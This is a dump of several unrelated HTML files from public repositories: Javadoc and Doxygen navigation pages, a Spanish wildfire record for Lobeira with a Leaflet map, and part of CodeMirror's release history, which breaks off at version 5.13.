<ul class="navList">
<li><a href="index.html?constant-values.html" target="_top">Frames</a></li>
<li><a href="constant-values.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_top">
<li><a href="allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_top");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip-navbar_top">
<!-- -->
</a></div>
<!-- ========= END OF TOP NAVBAR ========= -->
<div class="header">
<h1 title="Constant Field Values" class="title">Constant Field Values</h1>
<h2 title="Contents">Contents</h2>
</div>
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<div class="bottomNav"><a name="navbar_bottom">
<!-- -->
</a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="overview-summary.html">Overview</a></li>
<li>Package</li>
<li>Class</li>
<li><a href="overview-tree.html">Tree</a></li>
<li><a href="deprecated-list.html">Deprecated</a></li>
<li><a href="index-all.html">Index</a></li>
<li><a href="help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li>Prev</li>
<li>Next</li>
</ul>
<ul class="navList">
<li><a href="index.html?constant-values.html" target="_top">Frames</a></li>
<li><a href="constant-values.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_bottom">
<li><a href="allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_bottom");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip-navbar_bottom">
<!-- -->
</a></div>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
</body>
</html>
|
docs/classArMapFileLineSet-members.html
|
charismaticchiu/Robotics
|
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><head><meta http-equiv="Content-Type" content="text/html;charset=iso-8859-1">
<title>Aria: Member List</title>
<link href="doxygen.css" rel="stylesheet" type="text/css">
</head><body>
<!-- Generated by Doxygen 1.4.2 -->
<div class="qindex"><a class="qindex" href="main.html">Main Page</a> | <a class="qindex" href="hierarchy.html">Class Hierarchy</a> | <a class="qindex" href="classes.html">Alphabetical List</a> | <a class="qindex" href="annotated.html">Class List</a> | <a class="qindex" href="files.html">File List</a> | <a class="qindex" href="functions.html">Class Members</a> | <a class="qindex" href="globals.html">File Members</a> | <a class="qindex" href="pages.html">Related Pages</a> | <a class="qindex" href="examples.html">Examples</a></div>
<h1>ArMapFileLineSet Member List</h1>This is the complete list of members for <a class="el" href="classArMapFileLineSet.html">ArMapFileLineSet</a>, including all inherited members.<p><table>
<tr class="memlist"><td><a class="el" href="classArMapFileLineSet.html#a1">ArMapFileLineSet</a>()</td><td><a class="el" href="classArMapFileLineSet.html">ArMapFileLineSet</a></td><td><code> [inline]</code></td></tr>
<tr class="memlist"><td><a class="el" href="classArMapFileLineSet.html#a0">ArMapFileLineSet</a>(const ArMapFileLineSet &other)</td><td><a class="el" href="classArMapFileLineSet.html">ArMapFileLineSet</a></td><td><code> [inline]</code></td></tr>
<tr class="memlist"><td><a class="el" href="classArMapFileLineSet.html#e0">calculateChanges</a>(ArMapFileLineSet &origLines, ArMapFileLineSet &newLines, ArMapFileLineSet *deletedLinesOut, ArMapFileLineSet *addedLinesOut, bool isCheckChildren=true)</td><td><a class="el" href="classArMapFileLineSet.html">ArMapFileLineSet</a></td><td><code> [static]</code></td></tr>
<tr class="memlist"><td><a class="el" href="classArMapFileLineSet.html#a2">find</a>(const ArMapFileLine &groupParent)</td><td><a class="el" href="classArMapFileLineSet.html">ArMapFileLineSet</a></td><td></td></tr>
<tr class="memlist"><td><a class="el" href="classArMapFileLineSet.html#a3">log</a>(const char *prefix)</td><td><a class="el" href="classArMapFileLineSet.html">ArMapFileLineSet</a></td><td></td></tr>
<tr class="memlist"><td><a class="el" href="classArMapFileLineSet.html#a4">operator=</a>(const ArMapFileLineSet &other)</td><td><a class="el" href="classArMapFileLineSet.html">ArMapFileLineSet</a></td><td><code> [inline]</code></td></tr>
<tr class="memlist"><td><a class="el" href="classArMapFileLineSet.html#a5">~ArMapFileLineSet</a>()</td><td><a class="el" href="classArMapFileLineSet.html">ArMapFileLineSet</a></td><td><code> [inline]</code></td></tr>
</table><hr size="1"><address style="align: right;"><small>Generated on Thu Jan 7 10:34:42 2010 for Aria by
<a href="http://www.doxygen.org/index.html">
<img src="doxygen.png" alt="doxygen" align="middle" border="0"></a> 1.4.2 </small></address>
</body>
</html>
|
build/2004322594/index.html
|
flowsta/mi-news-app
|
<!doctype html>
<html lang="es">
<head>
<title>Incendio en LOBEIRA en GALICIA</title>
<link rel="stylesheet" href="../css/main.css" type="text/css" media="screen" />
<link rel="stylesheet" href="http://cdn.leafletjs.com/leaflet-0.7.2/leaflet.css" />
<script type="text/javascript" src="http://cdn.leafletjs.com/leaflet-0.7.2/leaflet.js?2"></script>
</head>
<body>
<div id="map" style="width:100%; height:400px;"></div>
<h1>Incendio en LOBEIRA (GALICIA)</h1>
<p>El incendio que afectó al municipio de LOBEIRA quemó una superficie forestal de 230.0000} de la comarca de A LIMIA de la provincia de OURENSE (GALICIA).</p>
<p>Se inició en 2004-08-01, se controló en 1430 y se extinguió en 1700.</p>
<p>La causa del incendio fue Sin datos. En la extinción del incendio participaron 9 personas, 2 vehiculos pesados y 1 medios aereos. Hubo 0 muertos y 0 heridos.</p>
<script type="text/javascript">
var map = L.map('map').setView([42.02957700, -8.06500000], 8);
var mapquestLayer = new L.TileLayer('http://{s}.mqcdn.com/tiles/1.0.0/map/{z}/{x}/{y}.png', {
maxZoom: 18,
attribution: 'Data, imagery and map information provided by <a href="http://open.mapquest.co.uk" target="_blank">MapQuest</a>,<a href="http://www.openstreetmap.org/" target="_blank">OpenStreetMap</a> and contributors.',
subdomains: ['otile1','otile2','otile3','otile4']
});
map.addLayer(mapquestLayer);
var marker = L.marker([42.02957700, -8.06500000]).addTo(map);
</script>
</body>
</html>
|
src/global/codemirror/doc/releases.html
|
formtools/core
|
<!doctype html>
<title>CodeMirror: Release History</title>
<meta charset="utf-8"/>
<link rel=stylesheet href="docs.css">
<script src="activebookmark.js"></script>
<div id=nav>
<a href="http://codemirror.net"><h1>CodeMirror</h1><img id=logo src="logo.png"></a>
<ul>
<li><a href="../index.html">Home</a>
<li><a href="manual.html">Manual</a>
<li><a href="https://github.com/codemirror/codemirror">Code</a>
</ul>
<ul>
<li><a class=active data-default="true" href="#v5">Version 5.x</a>
<li><a href="#v4">Version 4.x</a>
<li><a href="#v3">Version 3.x</a>
<li><a href="#v2">Version 2.x</a>
<li><a href="#v1">Version 0.x</a>
</ul>
</div>
<article>
<h2>Release notes and version history</h2>
<section id=v5 class=first>
<h2>Version 5.x</h2>
<p class="rel">20-09-2017: <a href="http://codemirror.net/codemirror-5.30.0.zip">Version 5.30.0</a>:</p>
<ul class="rel-note">
<li>Fixed a number of issues with drawing right-to-left selections and mouse selection in bidirectional text.</li>
<li><a href="http://codemirror.net/demo/search/">search addon</a>: Fix crash when restarting search after doing empty search.</li>
<li><a href="http://cm/doc/manual.html#addon_mark-selection">mark-selection addon</a>: Fix off-by-one bug.</li>
<li><a href="http://codemirror.net/demo/tern.html">tern addon</a>: Fix bad request made when editing at the bottom of a large document.</li>
<li><a href="http://codemirror.net/mode/javascript/">javascript mode</a>: Improve parsing in a number of corner cases.</li>
<li><a href="http://codemirror.net/mode/markdown/">markdown mode</a>: Fix crash when a sub-mode doesn't support indentation, allow uppercase X in task lists.</li>
<li><a href="http://codemirror.net/mode/gfm/">gfm mode</a>: Don't highlight SHA1 'hashes' without numbers to avoid false positives.</li>
<li><a href="http://codemirror.net/mode/soy/">soy mode</a>: Support injected data and <code>@param</code> in comments.</li>
<li><a href="http://codemirror.net/demo/simplemode.html">simple mode addon</a>: Allow groups in regexps when <code>token</code> isn't an array.</li>
</ul>
<p class="rel">24-08-2017: <a href="http://codemirror.net/codemirror-5.29.0.zip">Version 5.29.0</a>:</p>
<ul class="rel-note">
<li>Fix crash in contentEditable input style when editing near a bookmark.</li>
<li>Make sure change origins are preserved when splitting changes on <a href="http://codemirror.net/doc/manual.html#mark_readOnly">read-only marks</a>.</li>
<li><a href="http://codemirror.net/mode/javascript/">javascript mode</a>: More support for TypeScript syntax.</li>
<li><a href="http://codemirror.net/mode/d/">d mode</a>: Support nested comments.</li>
<li><a href="http://codemirror.net/mode/python/">python mode</a>: Improve tokenizing of operators.</li>
<li><a href="http://codemirror.net/mode/markdown/">markdown mode</a>: Further improve CommonMark conformance.</li>
<li><a href="http://codemirror.net/mode/css/">css mode</a>: Don't run comment tokens through the mode's state machine.</li>
<li><a href="http://codemirror.net/mode/shell/">shell mode</a>: Allow strings to span lines.</li>
<li><a href="http://codemirror.net/demo/search/">search addon</a>: Fix crash in persistent search when <code>extraKeys</code> is null.</li>
</ul>
<p class="rel">21-07-2017: <a href="http://codemirror.net/codemirror-5.28.0.zip">Version 5.28.0</a>:</p>
<ul class="rel-note">
<li>Fix copying of, or replacing editor content with, a single dash character when copying a big selection in some corner cases.</li>
<li>Make <a href="http://codemirror.net/doc/manual.html#command_goLineLeft"><code>"goLineLeft"</code></a>/<code>"goLineRight"</code> behave better on wrapped lines.</li>
<li><a href="http://codemirror.net/mode/sql/">sql mode</a>: Fix tokenizing of multi-dot operator and allow digits in subfield names.</li>
<li><a href="http://codemirror.net/doc/manual.html#addon_searchcursor">searchcursor addon</a>: Fix infinite loop on some composed character inputs.</li>
<li><a href="http://codemirror.net/mode/markdown/">markdown mode</a>: Make list parsing more CommonMark-compliant.</li>
<li><a href="http://codemirror.net/mode/gfm/">gfm mode</a>: Highlight colon syntax for emoji.</li>
</ul>
<p class="rel">29-06-2017: <a href="http://codemirror.net/codemirror-5.27.4.zip">Version 5.27.4</a>:</p>
<ul class="rel-note">
<li>Fix crash when using mode lookahead.</li>
<li><a href="http://codemirror.net/mode/markdown/">markdown mode</a>: Don't block inner mode's indentation support.</li>
</ul>
<p class="rel">22-06-2017: <a href="http://codemirror.net/codemirror-5.27.2.zip">Version 5.27.2</a>:</p>
<ul class="rel-note">
<li>Fix crash in the <a href="http://codemirror.net/demo/simplemode.html">simple mode</a> addon.</li>
</ul>
<p class="rel">22-06-2017: <a href="http://codemirror.net/codemirror-5.27.0.zip">Version 5.27.0</a>:</p>
<ul class="rel-note">
<li>Fix infinite loop in forced display update.</li>
<li>Properly disable the hidden textarea when <code>readOnly</code> is <code>"nocursor"</code>.</li>
<li>Calling the <code>Doc</code> constructor without <code>new</code> works again.</li>
<li><a href="http://codemirror.net/mode/sql/">sql mode</a>: Handle nested comments.</li>
<li><a href="http://codemirror.net/mode/javascript/">javascript mode</a>: Improve support for TypeScript syntax.</li>
<li><a href="http://codemirror.net/mode/markdown/">markdown mode</a>: Fix bug where markup was ignored on indented paragraph lines.</li>
<li><a href="http://codemirror.net/demo/vim.html">vim bindings</a>: Referencing invalid registers no longer causes an uncaught exception.</li>
<li><a href="http://codemirror.net/mode/rust/">rust mode</a>: Add the correct MIME type.</li>
<li><a href="http://codemirror.net/doc/manual.html#addon_matchbrackets">matchbrackets addon</a>: Document options.</li>
<li>Mouse button clicks can now be bound in keymaps by using names like <code>"LeftClick"</code> or <code>"Ctrl-Alt-MiddleTripleClick"</code>. When bound to a function, that function will be passed the position of the click as second argument.</li>
<li>The behavior of mouse selection and dragging can now be customized with the <a href="http://codemirror.net/doc/manual.html#option_configureMouse"><code>configureMouse</code></a> option.</li>
<li>Modes can now look ahead across line boundaries with the <a href="http://codemirror.net/doc/manual.html#StringStream"><code>StringStream</code></a><code>.lookahead</code> method.</li>
<li>Introduces a <code>"type"</code> token type, makes modes that recognize types output it, and add styling for it to the themes.</li>
<li>New <a href="http://codemirror.net/doc/manual.html#option_pasteLinesPerSelection"><code>pasteLinesPerSelection</code></a> option to control the behavior of pasting multiple lines into multiple selections.</li>
<li><a href="http://codemirror.net/doc/manual.html#addon_searchcursor">searchcursor addon</a>: Support multi-line regular expression matches, and normalize strings when matching.</li>
</ul>
<p class="rel">22-05-2017: <a href="http://codemirror.net/codemirror-5.26.0.zip">Version 5.26.0</a>:</p>
<ul class="rel-note">
<li>In textarea-mode, don't reset the input field during composition.</li>
<li>More careful restoration of selections in widgets, during editor redraw.</li>
<li><a href="http://codemirror.net/demo/vim.html">vim bindings</a>: Parse line offsets in line or range specs.</li>
<li><a href="http://codemirror.net/mode/javascript/">javascript mode</a>: More TypeScript parsing fixes.</li>
<li><a href="http://codemirror.net/mode/julia/">julia mode</a>: Fix issue where the mode gets stuck.</li>
<li><a href="http://codemirror.net/mode/markdown/">markdown mode</a>: Understand cross-line links, parse all bracketed things as links.</li>
<li><a href="http://codemirror.net/mode/soy/">soy mode</a>: Support single-quoted strings.</li>
<li><a href="http://codemirror.net/mode/go/">go mode</a>: Don't try to indent inside strings or comments.</li>
</ul>
<p class="rel">20-04-2017: <a href="http://codemirror.net/codemirror-5.25.2.zip">Version 5.25.2</a>:</p>
<ul class="rel-note">
<li>Better handling of selections that cover the whole viewport in contentEditable-mode.</li>
<li>No longer accidentally scroll the editor into view when calling <code>setValue</code>.</li>
<li>Work around Chrome Android bug when converting screen coordinates to editor positions.</li>
<li>Make sure long-clicking a selection sets a cursor and doesn't show the editor losing focus.</li>
<li>Fix issue where pointer events were incorrectly disabled on Chrome's overlay scrollbars.</li>
<li><a href="http://codemirror.net/mode/javascript/">javascript mode</a>: Recognize annotations and TypeScript-style type parameters.</li>
<li><a href="http://codemirror.net/mode/shell/">shell mode</a>: Handle nested braces.</li>
<li><a href="http://codemirror.net/mode/markdown/">markdown mode</a>: Make parsing of strong/em delimiters CommonMark-compliant.</li>
</ul>
<p class="rel">20-03-2017: <a href="http://codemirror.net/codemirror-5.25.0.zip">Version 5.25.0</a>:</p>
<ul class=rel-note>
<li>In contentEditable-mode, properly locate changes that repeat a character when inserted with IME.</li>
<li>Fix handling of selections bigger than the viewport in contentEditable mode.</li>
<li>Improve handling of changes that insert or delete lines in contentEditable mode.</li>
<li>Count Unicode control characters 0x80 to 0x9F as special (non-printing) chars.</li>
<li>Fix handling of shadow DOM roots when finding the active element.</li>
<li>Add <code>role=presentation</code> to more DOM elements to improve screen reader support.</li>
<li><a href="http://codemirror.net/doc/manual.html#addon_merge">merge addon</a>: Make aligning of unchanged chunks more robust.</li>
<li><a href="http://codemirror.net/doc/manual.html#addon_comment">comment addon</a>: Fix comment-toggling on a block of text that starts and ends in a (differnet) block comment.</li>
<li><a href="http://codemirror.net/mode/javascript/">javascript mode</a>: Improve support for TypeScript syntax.</li>
<li><a href="http://codemirror.net/mode/r/">r mode</a>: Fix indentation after semicolon-less statements.</li>
<li><a href="http://codemirror.net/mode/shell/">shell mode</a>: Properly handle escaped parentheses in parenthesized expressions.</li>
<li><a href="http://codemirror.net/mode/markdown/">markdown mode</a>: Fix a few bugs around leaving fenced code blocks.</li>
<li><a href="http://codemirror.net/mode/soy/">soy mode</a>: Improve indentation.</li>
<li><a href="http://codemirror.net/doc/manual.html#addon_lint">lint addon</a>: Support asynchronous linters that return promises.</li>
<li><a href="http://codemirror.net/doc/manual.html#addon_continuelist">continuelist addon</a>: Support continuing task lists.</li>
<li><a href="http://codemirror.net/demo/vim.html">vim bindings</a>: Make Y behave like yy.</li>
<li><a href="http://codemirror.net/mode/sql/">sql mode</a>: Support sqlite dialect.</li>
</ul>
<p class="rel">22-02-2017: <a href="http://codemirror.net/codemirror-5.24.2.zip">Version 5.24.2</a>:</p>
<ul class=rel-note>
<li><a href="http://codemirror.net/mode/javascript/">javascript mode</a>: Support computed class method names.</li>
<li><a href="http://codemirror.net/doc/manual.html#addon_merge">merge addon</a>: Improve aligning of unchanged code in the presence of marks and line widgets.</li>
</ul>
<p class="rel">20-02-2017: <a href="http://codemirror.net/codemirror-5.24.0.zip">Version 5.24.0</a>:</p>
<ul class=rel-note>
<li>Positions now support a <code>sticky</code> property which determines whether they should be associated with the character before (value <code>"before"</code>) or after (value <code>"after"</code>) them.</li>
<li><a href="http://codemirror.net/demo/vim.html">vim bindings</a>: Make it possible to remove built-in bindings through the API.</li>
<li><a href="http://codemirror.net/doc/manual.html#addon_comment">comment addon</a>: Support a per-mode <code>useInnerComments</code> option to optionally suppress descending to the inner modes to get comment strings.</li>
<li>A cursor directly before a line-wrapping break is now drawn before or after the line break depending on which direction you arrived from.</li>
<li>Visual cursor motion in line-wrapped right-to-left text should be much more correct.</li>
<li>Fix bug in handling of read-only marked text.</li>
<li><a href="http://codemirror.net/mode/shell/">shell mode</a>: Properly tokenize nested parentheses.</li>
<li><a href="http://codemirror.net/mode/python/">python mode</a>: Support underscores in number literals.</li>
<li><a href="http://codemirror.net/mode/sass/">sass mode</a>: Uses the full list of CSS properties and keywords from the CSS mode, rather than defining its own incomplete subset. Now depends on the css mode.</li>
<li><a href="http://codemirror.net/mode/css/">css mode</a>: Expose <code>lineComment</code> property for LESS and SCSS dialects. Recognize vendor prefixes on pseudo-elements.</li>
<li><a href="http://codemirror.net/mode/julia/">julia mode</a>: Properly indent <code>elseif</code> lines.</li>
<li><a href="http://codemirror.net/mode/markdown/">markdown mode</a>: Properly recognize the end of fenced code blocks when inside other markup.</li>
<li><a href="http://codemirror.net/mode/clike/">scala mode</a>: Improve handling of operators containing <code>#</code>, <code>@</code>, and <code>:</code> chars.</li>
<li><a href="http://codemirror.net/mode/xml/">xml mode</a>: Allow dashes in HTML tag names.</li>
<li><a href="http://codemirror.net/mode/javascript/">javascript mode</a>: Improve parsing of async methods, TypeScript-style comma-separated superclass lists.</li>
<li><a href="http://codemirror.net/demo/folding.html">indent-fold addon</a>: Ignore comment lines.</li>
</ul>
<p class="rel">19-01-2017: <a href="http://codemirror.net/codemirror-5.23.0.zip">Version 5.23.0</a>:</p>
<ul class=rel-note>
<li>Presentation-related elements DOM elements are now marked as such to help screen readers.</li>
<li><a href="http://codemirror.net/mode/markdown/">markdown mode</a>: Be more picky about what HTML tags look like to avoid false positives.</li>
<li><code>findModeByMIME</code> now understands <code>+json</code> and <code>+xml</code> MIME suffixes.</li>
<li><a href="http://codemirror.net/doc/manual.html#addon_closebrackets">closebrackets addon</a>: Add support for an <code>override</code> option to ignore language-specific defaults.</li>
<li><a href="http://codemirror.net/doc/manual.html#addon_panel">panel addon</a>: Add a <code>stable</code> option that auto-scrolls the content to keep it in the same place when inserting/removing a panel.</li>
</ul>
<p class="rel">20-12-2016: <a href="http://codemirror.net/codemirror-5.22.0.zip">Version 5.22.0</a>:</p>
<ul class=rel-note>
<li><a href="http://codemirror.net/demo/sublime.html">sublime bindings</a>: Make <code>selectBetweenBrackets</code> work with multiple cursors.</li>
<li><a href="http://codemirror.net/mode/javascript/">javascript mode</a>: Fix issues with parsing complex TypeScript types, imports, and exports.</li>
<li>A contentEditable editor instance with autofocus enabled no longer crashes during initializing.</li>
<li><a href="http://codemirror.net/demo/emacs.html">emacs bindings</a>: Export <code>CodeMirror.emacs</code> to allow other addons to hook into Emacs-style functionality.</li>
<li><a href="http://codemirror.net/doc/manual.html#addon_active-line">active-line addon</a>: Add <code>nonEmpty</code> option.</li>
<li>New event: <a href="http://codemirror.net/doc/manual.html#event_optionChange"><code>optionChange</code></a>.</li>
</ul>
<p class="rel">21-11-2016: <a href="http://codemirror.net/codemirror-5.21.0.zip">Version 5.21.0</a>:</p>
<ul class=rel-note>
<li>Tapping/clicking the editor in <a href="http://codemirror.net/doc/manual.html#option_inputStyle">contentEditable mode</a> on Chrome now puts the cursor at the tapped position.</li>
<li>Fix various crashes and misbehaviors when reading composition events in <a href="http://codemirror.net/doc/manual.html#option_inputStyle">contentEditable mode</a>.</li>
<li>Catches and ignores an IE 'Unspecified Error' when creating an editor in an iframe before there is a <code><body></code>.</li>
<li><a href="http://codemirror.net/doc/manual.html#addon_merge">merge addon</a>: Fix several issues in the chunk-aligning feature.</li>
<li><a href="http://codemirror.net/mode/verilog">verilog mode</a>: Rewritten to address various issues.</li>
<li><a href="http://codemirror.net/mode/julia">julia mode</a>: Recognize Julia 0.5 syntax.</li>
<li><a href="http://codemirror.net/mode/swift">swift mode</a>: Various fixes and adjustments to current syntax.</li>
<li><a href="http://codemirror.net/mode/markdown">markdown mode</a>: Allow lists without a blank line above them.</li>
<li>The <a href="http://codemirror.net/doc/manual.html#setGutterMarker"><code>setGutterMarker</code></a>, <a href="http://codemirror.net/doc/manual.html#clearGutter"><code>clearGutter</code></a>, and <a href="http://codemirror.net/doc/manual.html#lineInfo"><code>lineInfo</code></a> methods are now available on <code>Doc</code> objects.</li>
<li>The <a href="http://codemirror.net/doc/manual.html#heightAtLine"><code>heightAtLine</code></a> method now takes an extra argument to allow finding the height at the top of the line's line widgets.</li>
<li><a href="http://codemirror.net/mode/ruby">ruby mode</a>: <code>else</code> and <code>elsif</code> are now immediately indented.</li>
<li><a href="http://codemirror.net/demo/vim.html">vim bindings</a>: Bind Ctrl-T and Ctrl-D to in- and dedent in insert mode.</li>
</ul>
<p class="rel">20-10-2016: <a href="http://codemirror.net/codemirror-5.20.0.zip">Version 5.20.0</a>:</p>
<ul class=rel-note>
<li>Make <code>newlineAndIndent</code> command work with multiple cursors on the same line.</li>
<li>Make sure keypress events for backspace are ignored.</li>
<li>Tokens styled with overlays no longer get a nonsense <code>cm-cm-overlay</code> class.</li>
<li>Line endings for pasted content are now normalized to the editor's <a href="http://codemirror.net/doc/manual.html#option_lineSeparator">preferred ending</a>.</li>
<li><a href="http://codemirror.net/mode/javascript">javascript mode</a>: Improve support for class expressions. Support TypeScript optional class properties, the <code>abstract</code> keyword, and return type declarations for arrow functions.</li>
<li><a href="http://codemirror.net/mode/css">css mode</a>: Fix highlighting of mixed-case keywords.</li>
<li><a href="http://codemirror.net/doc/manual.html#addon_closebrackets">closebrackets addon</a>: Improve behavior when typing a quote before a string.</li>
<li>The core is now maintained as a number of small files, using ES6 syntax and modules, under the <code>src/</code> directory. A git checkout no longer contains a working <code>codemirror.js</code> until you <code>npm build</code> (but when installing from NPM, it is included).</li>
<li>The <a href="http://codemirror.net/doc/manual.html#event_refresh"><code>refresh</code></a> event is now documented and stable.</li>
</ul>
<p class="rel">20-09-2016: <a href="http://codemirror.net/codemirror-5.19.0.zip">Version 5.19.0</a>:</p>
<ul class=rel-note>
<li><a href="http://codemirror.net/mode/erlang">erlang mode</a>: Fix mode crash when trying to read an empty context.</li>
<li><a href="http://codemirror.net/doc/manual.html#addon_comment">comment addon</a>: Fix broken behavior when toggling comments inside a comment.</li>
<li>xml-fold addon: Fix a null-dereference bug.</li>
<li>InstallationPage up and page down now do something even in single-line documents.</li>
<li>Fix an issue where the cursor position could be off in really long (~8000 character) tokens.</li>
<li><a href="http://codemirror.net/mode/javascript">javascript mode</a>: Better indentation when semicolons are missing. Better support for TypeScript classes, optional parameters, and the <code>type</code> keyword.</li>
<li>The <a href="http://codemirror.net/doc/manual.html#event_blur"><code>blur</code></a> and <a href="http://codemirror.net/doc/manual.html#event_focus"><code>focus</code></a> events now pass the DOM event to their handlers.</li>
</ul>
<p class="rel">23-08-2016: <a href="http://codemirror.net/codemirror-5.18.2.zip">Version 5.18.2</a>:</p>
<ul class=rel-note>
<li><a href="http://codemirror.net/mode/vue">vue mode</a>: Fix outdated references to renamed Pug mode dependency.</li>
</ul>
<p class="rel">22-08-2016: <a href="http://codemirror.net/codemirror-5.18.0.zip">Version 5.18.0</a>:</p>
<ul class=rel-note>
<li>Make sure <a href="http://codemirror.net/doc/manual.html#addLineClass">gutter backgrounds</a> stick to the rest of the gutter during horizontal scrolling.</li>
<li>The contenteditable <a href="http://codemirror.net/doc/manual.html#option_inputStyle"><code>inputStyle</code></a> now properly supports pasting on pre-Edge IE versions.</li>
<li><a href="http://codemirror.net/mode/javascript">javascript mode</a>: Fix some small parsing bugs and improve TypeScript support.</li>
<li><a href="http://codemirror.net/doc/manual.html#addon_matchbrackets">matchbrackets addon</a>: Fix bug where active highlighting was left in editor when the addon was disabled.</li>
<li><a href="http://codemirror.net/doc/manual.html#addon_match-highlighter">match-highlighter addon</a>: Only start highlighting things when the editor gains focus.</li>
<li><a href="http://codemirror.net/doc/manual.html#addon_javascript-hint">javascript-hint addon</a>: Also complete non-enumerable properties.</li>
<li>The <a href="http://codemirror.net/doc/manual.html#addOverlay"><code>addOverlay</code></a> method now supports a <code>priority</code> option to control the order in which overlays are applied.</li>
<li>MIME types that end in <code>+json</code> now default to the JSON mode when the MIME itself is not defined.</li>
<li>The mode formerly known as Jade was renamed to <a href="http://codemirror.net/mode/pug">Pug</a>.</li>
<li>The <a href="http://codemirror.net/mode/python">Python mode</a> now defaults to Python 3 (rather than 2) syntax.</li>
</ul>
<p class="rel">19-07-2016: <a href="http://codemirror.net/codemirror-5.17.0.zip">Version 5.17.0</a>:</p>
<ul class="rel-note">
<li>Fix problem with wrapped trailing whitespace displaying incorrectly.</li>
<li>Prevent IME dialog from overlapping typed content in Chrome.</li>
<li>Improve measuring of characters near a line wrap.</li>
<li><a href="http://codemirror.net/mode/javascript">javascript mode</a>: Improve support for <code>async</code>, allow trailing commas in <code>import</code> lists.</li>
<li><a href="http://codemirror.net/demo/vim.html">vim bindings</a>: Fix backspace in replace mode.</li>
<li><a href="http://codemirror.net/demo/sublime.html">sublime bindings</a>: Fix some key bindings on OS X to match Sublime Text.</li>
<li><a href="http://codemirror.net/mode/markdown">markdown mode</a>: Add more classes to image links in highlight-formatting mode.</li>
</ul>
<p class="rel">20-06-2016: <a href="http://codemirror.net/codemirror-5.16.0.zip">Version 5.16.0</a>:</p>
<ul class="rel-note">
<li>Fix glitches when dragging content caused by the drop indicator receiving mouse events.</li>
<li>Make Control-drag work on Firefox.</li>
<li>Make clicking or selection-dragging at the end of a wrapped line select the right position.</li>
<li><a href="http://codemirror.net/doc/manual.html#addon_show-hint">show-hint addon</a>: Prevent widget scrollbar from hiding part of the hint text.</li>
<li><a href="http://codemirror.net/doc/manual.html#addon_rulers">rulers addon</a>: Prevent rulers from forcing a horizontal editor scrollbar.</li>
<li><a href="http://codemirror.net/doc/manual.html#addon_search">search addon</a>: Automatically bind search-related keys in persistent dialog.</li>
<li><a href="http://codemirror.net/demo/sublime.html">sublime keymap</a>: Add a multi-cursor aware smart backspace binding.</li>
</ul>
<p class="rel">20-05-2016: <a href="http://codemirror.net/codemirror-5.15.2.zip">Version 5.15.2</a>:</p>
<ul class="rel-note">
<li>Fix a critical document corruption bug that occurs when a document is gradually grown.</li>
</ul>
<p class="rel">20-05-2016: <a href="http://codemirror.net/codemirror-5.15.0.zip">Version 5.15.0</a>:</p>
<ul class="rel-note">
<li>Fix bug that caused the selection to reset when focusing the editor in contentEditable input mode.</li>
<li>Fix issue where not all ASCII control characters were being replaced by placeholders.</li>
<li>Remove the assumption that all modes have a <code>startState</code> method from several wrapping modes.</li>
<li>Fix issue where the editor would complain about overlapping collapsed ranges when there weren't any.</li>
<li>Optimize document tree building when loading or pasting huge chunks of content.</li>
<li>Explicitly bind Ctrl-O on OS X to make that binding (“open line”) act as expected.</li>
<li>Pasting <a href="http://codemirror.net/doc/manual.html#option_lineWiseCopyCut">linewise-copied</a> content when there is no selection now inserts the lines above the current line.</li>
<li><a href="http://codemirror.net/mode/markdown/">markdown mode</a>: Fix several issues in matching link targets.</li>
<li><a href="http://codemirror.net/mode/clike/">clike mode</a>: Improve indentation of C++ template declarations.</li>
<li><a href="http://codemirror.net/mode/javascript/">javascript mode</a>: Support <code>async</code>/<code>await</code> and improve support for TypeScript type syntax.</li>
</ul>
<p class="rel">20-04-2016: <a href="http://codemirror.net/codemirror-5.14.0.zip">Version 5.14.0</a>:</p>
<ul class="rel-note">
<li><a href="http://codemirror.net/doc/manual.html#posFromIndex"><code>posFromIndex</code></a> and <a href="http://codemirror.net/doc/manual.html#indexFromPos"><code>indexFromPos</code></a> now take <a href="http://codemirror.net/doc/manual.html#option_lineSeparator"><code>lineSeparator</code></a> into account</li>
<li><a href="http://codemirror.net/demo/vim.html">vim bindings</a>: Only call <code>.save()</code> when it is actually available</li>
<li><a href="http://codemirror.net/doc/manual.html#addon_comment">comment addon</a>: Be careful not to mangle multi-line strings</li>
<li><a href="http://codemirror.net/mode/python/index.html">Python mode</a>: Improve distinguishing of decorators from <code>@</code> operators</li>
<li><a href="http://codemirror.net/doc/manual.html#findMarks"><code>findMarks</code></a>: No longer return marks that touch but don't overlap given range</li>
<li><a href="http://codemirror.net/demo/vim.html">vim bindings</a>: Add yank command</li>
<li><a href="http://codemirror.net/doc/manual.html#addon_match-highlighter">match-highlighter addon</a>: Add <code>trim</code> option to disable ignoring of whitespace</li>
<li><a href="http://codemirror.net/mode/powershell/index.html">PowerShell mode</a>: Added</li>
<li><a href="http://codemirror.net/mode/yacas/index.html">Yacas mode</a>: Added</li>
<li><a href="http://codemirror.net/mode/webidl/index.html">Web IDL mode</a>: Added</li>
<li><a href="http://codemirror.net/mode/sas/index.html">SAS mode</a>: Added</li>
<li><a href="http://codemirror.net/mode/mbox/index.html">mbox mode</a>: Added</li>
<li>Full <a href="https://github.com/codemirror/CodeMirror/compare/5.13.4...5.14.0">list of patches</a></li>
</ul>
<p class="rel">21-03-2016: <a href="http://codemirror.net/codemirror-5.13.2.zip">Version 5.13.2</a>:</p>
<ul class="rel-note">
<li>Solves a problem where the gutter would sometimes not extend all the way to the end of the document.</li>
</ul>
<p class="rel">21-03-2016: <a href="http://codemirror.net/codemirror-5.13.zip">Version 5.13</a>:</p>
<ul class="rel-note">
